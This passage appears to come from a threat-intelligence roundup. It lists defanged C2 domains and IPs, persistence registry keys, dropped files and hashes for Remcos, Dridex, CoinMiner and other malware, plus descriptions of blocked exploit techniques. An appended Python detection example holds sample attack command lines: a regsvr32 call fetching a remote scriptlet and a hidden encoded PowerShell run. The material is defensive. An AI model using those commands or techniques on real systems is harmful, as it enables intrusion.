<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 772d3e1cf411932582ba4607caf9d2f7
2
<HKCU>\SOFTWARE\772D3E1CF411932582BA4607CAF9D2F7 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: e101a39ab5de59589562aa0ff3295ba5
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: e101a39ab5de59589562aa0ff3295ba5
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: babe8364d0b44de2ea6e4bcccd70281e
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: babe8364d0b44de2ea6e4bcccd70281e
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\OPENWITHLIST 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 4cad00898e83b5ca86cd4000a82f9e90
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 4cad00898e83b5ca86cd4000a82f9e90
1
<HKCU>\SOFTWARE\4CAD00898E83B5CA86CD4000A82F9E90 1
<HKCU>\SOFTWARE\4CAD00898E83B5CA86CD4000A82F9E90
Value Name: US
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 87434db012ce80357c71a896aba97c20
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 87434db012ce80357c71a896aba97c20
1
<HKCU>\SOFTWARE\87434DB012CE80357C71A896ABA97C20 1
<HKCU>\SOFTWARE\87434DB012CE80357C71A896ABA97C20
Value Name: US
1
<HKCU>\SOFTWARE\2969DBEA9B653B908B01B2012E4BC676 1
<HKCU>\SOFTWARE\2969DBEA9B653B908B01B2012E4BC676
Value Name: US
1
Mutexes | Occurrences
<32 random hex characters> 14
Global\c0b9ada1-72a0-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
23[.]3[.]13[.]154 1
23[.]3[.]13[.]88 1
191[.]251[.]55[.]8 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
ctldl[.]windowsupdate[.]com 1
a767[.]dscg3[.]akamai[.]net 1
sistem1[.]gotdns[.]ch 1
balakis[.]ddns[.]net 1
f00[.]ddns[.]net 1
hikonorz[.]no-ip[.]org 1
vida01[.]ddns[.]net 1
litchh[.]ddns[.]net 1
spacespy[.]zapto[.]org 1
trojanoficial1936[.]ddns[.]net 1
Files and/or directories created | Occurrences
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\<exe name>.log 15
\ba4c12bee3027d94da5c81db2d196bfd.exe 4
%TEMP%\svchost.exe 4
%TEMP%\svchost.exe.tmp 4
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ba4c12bee3027d94da5c81db2d196bfd.exe 4
E:\ba4c12bee3027d94da5c81db2d196bfd.exe 4
%TEMP%\ Explorer.exe 3
%TEMP%\ Explorer.exe.tmp 3
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\772d3e1cf411932582ba4607caf9d2f7.exe 2
%TEMP%\server.exe 1
%TEMP%\svhost.exe 1
%TEMP%\csrss.exe 1
%TEMP%\server.exe.tmp 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\babe8364d0b44de2ea6e4bcccd70281e.exe 1
E:\772d3e1cf411932582ba4607caf9d2f7.exe 1
\772d3e1cf411932582ba4607caf9d2f7.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\e101a39ab5de59589562aa0ff3295ba5.exe 1
E:\4cad00898e83b5ca86cd4000a82f9e90.exe 1
%APPDATA%\ Explorer.exe.tmp 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\4cad00898e83b5ca86cd4000a82f9e90.exe 1
\4cad00898e83b5ca86cd4000a82f9e90.exe 1
%APPDATA%\ Explorer.exe 1
E:\87434db012ce80357c71a896aba97c20.exe 1
%TEMP%\BOT-YT.exe.tmp 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\87434db012ce80357c71a896aba97c20.exe 1

*See JSON for more IOCs

File Hashes

0db9ac0a62287da4d0b80263a45ddabc79dd3f54d6f989e89185cd63dc22e566
1032f1415153dedcd1209bdb2a83049c7af94b3c5dfaa8444a711668b44a64e7
219067b11bde409cbfe74925bba7a4edeb737bb3e7335c944b1ddd285a8121bc
377ee96a9cad458044adf93f4489e073498ba035225f659ceb8f454579bcf00a
53866f76ec02d7b28ebe834130523393a4228ff644cb9ff4ba96c4b5f6eb7d35
7996eb113ec08dce2dae366b5906bdc47e308e1bd3c8021c0e5e075044973d3a
9174438c87aedbe8ace4830cf495e79ac8017fac6a053be6c4a1e425c7127879
a9c4abecd7507afbf0158e074e1cb86ce4d8fe044dda116c8c8b61ef0be17b2d
b824602e58c113b6fa3bee703b305ce7afdca6f623dfd45433f1bf91b7161f88
be3de999cb21edb7cc05c0c8cd9c351fe43baee6332b3cfa8e4c94bcc14f2aec
c654a3b65a1618c56ec031abba4351ce8a2e4ad588e97055f300ed8315b30005
d397d4fdf0b7d492cf6ef35cbff4f597103ae38541baa9d42ab0a70e46ada8ac
dbd197e117b5bab38c804eaba8b01b6618134418dffcfd63307e81dd67297b85
f27c56ad0fc37b98fc3eb8dd614d8b6dbaa7a85a70c4c12ae581b9b43b5e272a
f76ef7de1759f6716082b5a5dec905382c9995d2d8f3f77039488df2bcc195f0

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.CoinMiner-9833198-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
136[.]144[.]56[.]255 26
147[.]75[.]47[.]199 26
135[.]181[.]49[.]32 26
172[.]67[.]155[.]149 15
104[.]21[.]80[.]237 11
50[.]19[.]252[.]36 4
23[.]21[.]76[.]253 4
54[.]225[.]220[.]115 3
54[.]235[.]189[.]250 3
54[.]225[.]66[.]103 2
54[.]235[.]83[.]248 2
23[.]21[.]126[.]66 2
54[.]221[.]253[.]252 2
23[.]21[.]252[.]4 1
54[.]235[.]142[.]93 1
54[.]243[.]164[.]148 1
23[.]21[.]140[.]41 1
50[.]19[.]96[.]218 1
23[.]21[.]48[.]44 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
icanhazip[.]com 26
thesellminingpanelka[.]space 26
api[.]ipify[.]org 21
Files and/or directories created | Occurrences
%APPDATA%\WinHost 26
%APPDATA%\WinHost\.msdat 26
%APPDATA%\WinHost\kernel.exe 26
%APPDATA%\WinHost\syswow.exe 26
%System32%\Tasks\UpdateWindows 26

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Remcos-9835338-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: win
8
<HKCU>\Software\Remcos-<random, matching '[A-Z0-9]{6}'> 8
<HKCU>\Software\Remcos-<random, matching '[A-Z0-9]{6}'>
Value Name: exepath
8
<HKCU>\Software\Remcos-<random, matching '[A-Z0-9]{6}'>
Value Name: licence
8
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: AGP Manager
2
Mutexes | Occurrences
Remcos_Mutex_Inj 8
Remcos-<random, matching [A-Z0-9]{6}> 8
Global\{8b6f465d-30c8-4bc5-bfa5-37d69ca0c565} 2
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
103[.]150[.]60[.]242 10
192[.]253[.]246[.]142 3
104[.]250[.]185[.]70 2
45[.]74[.]32[.]12 1
37[.]230[.]130[.]153 1
196[.]251[.]67[.]199 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
mtspsmjeli[.]sch[.]id 10
hsyuwbvxczbansmloiujdhsbnbcgywqauaghxvz[.]ydns[.]eu 3
ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop[.]ydns[.]eu 2
hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap[.]ydns[.]eu 2
swryijgrvcsgkopnmcdertvgdswbvmophtfdczxs[.]ydns[.]eu 1
ghdyuienah123[.]freedynamicdns[.]org 1
gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye[.]ydns[.]eu 1
Files and/or directories created | Occurrences
%APPDATA%\logs.dat 8
%TEMP%\install.vbs 8
%APPDATA%\win.exe 7
%ProgramFiles(x86)%\AGP Manager 2
%ProgramFiles(x86)%\AGP Manager\agpmgr.exe 2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\task.dat 2
%System32%\Tasks\AGP Manager 2
%System32%\Tasks\AGP Manager Task 2
%TEMP%\tmp50F9.tmp 1
%TEMP%\tmp5888.tmp 1
%TEMP%\tmp5E24.tmp 1
%TEMP%\tmp5667.tmp 1
%APPDATA%\vlc.exe 1

File Hashes

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9833501-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
26
Mutexes | Occurrences
<random, matching [A-Z0-9]{10}> 26
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
172[.]217[.]10[.]78 25
104[.]23[.]98[.]190 15
104[.]23[.]99[.]190 11
173[.]194[.]68[.]100/31 11
72[.]21[.]81[.]240 8
23[.]3[.]13[.]154 6
173[.]194[.]68[.]113 6
173[.]194[.]68[.]138/31 6
23[.]3[.]13[.]88 4
173[.]194[.]68[.]102 2
172[.]217[.]6[.]238 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
pastebin[.]com 26
w[.]google[.]com 26
www3[.]l[.]google[.]com 25
ctldl[.]windowsupdate[.]com 18
a767[.]dscg3[.]akamai[.]net 10
cs11[.]wpc[.]v0cdn[.]net 8
www[.]upz7qrbwmu[.]com 2
www[.]eckjconcv9[.]com 2
www[.]2qpihnec9c[.]com 2
www[.]pywy4qb7e8[.]com 2
www[.]h1dfqgsnro[.]com 2
www[.]su0tipnipi[.]com 2
www[.]7br0aq6uuk[.]com 2
www[.]kweqxn5kq0[.]com 2
www[.]cxp0bxh0do[.]com 2
www[.]rpucoty6ru[.]com 2
www[.]sd2ylwl2qq[.]com 2
www[.]k4aiunpqhu[.]com 2
www[.]z4gzstsojt[.]com 2
www[.]0lye7vcyap[.]com 2
www[.]3ekqkrbab5[.]com 2
www[.]brni2gfck5[.]com 2
www[.]in8t4hicui[.]com 2
www[.]ioxl2nqbhx[.]com 2
www[.]mz2xcs9uhn[.]com 2

*See JSON for more IOCs

Files and/or directories created (Occurrences)
<malware cwd>\old_<malware exe name> (copy) 25
\Temp\HncDownload\Update.log 2
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 2
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 2

File Hashes

*See JSON for more IOCs

Coverage

Product             Protection
AMP                 This has coverage
Cloudlock           N/A
CWS                 This has coverage
Email Security      This has coverage
Network Security    This has coverage
Stealthwatch        N/A
Stealthwatch Cloud  N/A
Threat Grid         This has coverage
Umbrella            N/A
WSA                 N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Ursu-9833566-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Mutexes (Occurrences)
USERNAME 4
IP Addresses contacted by malware. Does not indicate maliciousness (Occurrences)
208[.]100[.]26[.]242 4
192[.]109[.]92[.]99 1
Domain Names contacted by malware. Does not indicate maliciousness (Occurrences)
52eva[.]top 4
Files and/or directories created (Occurrences)
%ProgramFiles(x86)%\Adobe\Reader 9.0\Reader\rasadhlp.dll 4
%ProgramFiles(x86)%\Java\jre6\rasadhlp.dll 4
%ProgramFiles(x86)%\Java\jre7\rasadhlp.dll 4
%ProgramFiles(x86)%\Microsoft Office\rasadhlp.dll 4
%ProgramFiles(x86)%\Mozilla Firefox\rasadhlp.dll 4
%ProgramFiles%\WinRAP 4
%ProgramFiles%\WinRAP\RarExt32.dll 4
%System32%\wbem\rasadhlp.dll 3
%SystemRoot%\SystemApps\ShellExperienceHost_cw5n1h2txyewy\rasadhlp.dll 3
%SystemRoot%\rasadhlp.dll 3

File Hashes

*See JSON for more IOCs

Coverage

Product             Protection
AMP                 This has coverage
Cloudlock           N/A
CWS                 This has coverage
Email Security      This has coverage
Network Security    This has coverage
Stealthwatch        N/A
Stealthwatch Cloud  N/A
Threat Grid         This has coverage
Umbrella            N/A
WSA                 N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Crystalbit-Apple DLL double hijack detected - (10120)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
Process hollowing detected - (3572)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (2886)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
A Microsoft Office process has started a Windows utility. - (1687)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
Kovter injection detected - (739)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Squiblydoo application whitelist bypass attempt detected. - (698)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker-controlled server.
CVE-2019-0708 detected - (114)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Gamarue malware detected - (107)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Trickbot malware detected - (85)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected that some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving since it appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Dealply adware detected - (53)
DealPly is adware that claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
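To show how three of the behavioral signatures above (the excessively long PowerShell command, the Office process starting a Windows utility, and the regsvr32-based Squiblydoo bypass) can be expressed as process-creation telemetry checks, here is an added Python example that is not part of the Talos post and not the AMP rule set. The length threshold, the parent/child name lists, and the sample events are all constructed assumptions for illustration.

```python
import re
from dataclasses import dataclass

# Assumed thresholds and name lists (illustrative, not the AMP rule logic)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
WINDOWS_UTILITIES = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                     "mshta.exe", "regsvr32.exe", "rundll32.exe"}
LONG_POWERSHELL_CHARS = 1000
# regsvr32 loading a remote scriptlet via the scrobj.dll handler
SQUIBLYDOO = re.compile(r"/i:\s*https?://\S+.*scrobj\.dll", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent) -> list:
    """Return the names of the signatures this process-creation event matches."""
    parent, image = _basename(event.parent_image), _basename(event.image)
    cmd = event.command_line
    hits = []
    if image == "powershell.exe" and len(cmd) >= LONG_POWERSHELL_CHARS:
        hits.append("Excessively long PowerShell command")
    if parent in OFFICE_PARENTS and image in WINDOWS_UTILITIES:
        hits.append("Microsoft Office process started a Windows utility")
    if image == "regsvr32.exe" and SQUIBLYDOO.search(cmd):
        hits.append("Squiblydoo application whitelist bypass attempt")
    return hits


# Constructed sample events (not real telemetry); the long PowerShell
# argument is a placeholder string standing in for an encoded script.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c start update.vbs"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc " + "A" * 1500),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\regsvr32.exe",
                 "regsvr32.exe /s /i:http://example.invalid/update.sct scrobj.dll"),
    ProcessEvent(r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]


def triage(events):
    """Keep only events that match at least one signature."""
    return [(e.image, classify(e)) for e in events if classify(e)]
```

In a real deployment these checks would run over Sysmon event ID 1 or EDR process-start records; the benign svchost.exe event shows that ordinary system activity yields no finding.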